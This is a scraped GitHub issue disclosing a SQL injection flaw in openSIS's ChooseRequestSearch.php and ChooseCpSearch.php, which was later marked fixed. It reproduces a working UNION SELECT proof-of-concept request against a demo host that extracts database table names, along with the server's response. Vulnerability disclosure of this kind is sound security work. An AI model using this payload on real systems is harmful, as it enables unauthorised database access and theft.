Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Due to no security mechanism was implemented in parameter id, attacker can inject arbitrary SQL query and extract database informations
id
ChooseCpSearch.php ChooseRequestSearch.php
GET /ChooseRequestSearch.php?id=1'+union+select+1,group_concat(table_name),3+FROM+information_schema.tables+WHERE+table_schema=database()--+-&table_name=courses HTTP/1.1 Host: demo.opensis.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://demo.opensis.com/Modules.php?modname=miscellaneous/Portal.php&failed_login= Cookie: PHPSESSID=hlbs4pioon9tgupfig1n2hsgu1
HTTP/1.1 200 OK Date: Wed, 01 Sep 2021 15:34:05 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.29 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1194 Connection: close Content-Type: text/html course_modal_request||3 courses were found.
The text was updated successfully, but these errors were encountered:
@openSISAdmin please review and reply soon
Sorry, something went wrong.
Fixed
No branches or pull requests
Due to no security mechanism was implemented in parameter
id, attacker can inject arbitrary SQL query and extract database informationsVulnerable code section
ChooseCpSearch.php


ChooseRequestSearch.php
Request and Response
The text was updated successfully, but these errors were encountered: